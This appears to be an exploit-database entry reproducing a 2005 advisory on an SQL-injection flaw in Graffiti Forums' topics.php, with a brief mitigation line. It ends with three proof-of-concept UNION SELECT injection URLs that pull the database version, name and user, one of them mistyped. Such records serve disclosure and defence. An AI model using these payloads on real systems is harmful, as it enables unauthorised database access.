header-logo
Suggest Exploit
vendor:
Graffiti Forums
by:
SecurityFocus
7.5
CVSS
HIGH
SQL-injection
89
CWE
Product Name: Graffiti Forums
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: N/A
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2005

Graffiti Forums SQL-injection Vulnerability

Graffiti Forums is prone to an SQL-injection vulnerability due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. Successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database implementation.

Mitigation:

Input validation and proper sanitization of user-supplied data should be implemented to prevent SQL injection attacks.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/18928/info

Graffiti Forums is prone to an SQL-injection vulnerability. 

This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. 

Successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database implementation.

http://www.example.com/topics.php?f=-1 union all select version()--
http://www.example.com/topics.php?f=-1 union ll select database()--
http://www.example.com/topics.php?f=-1 union all select user()--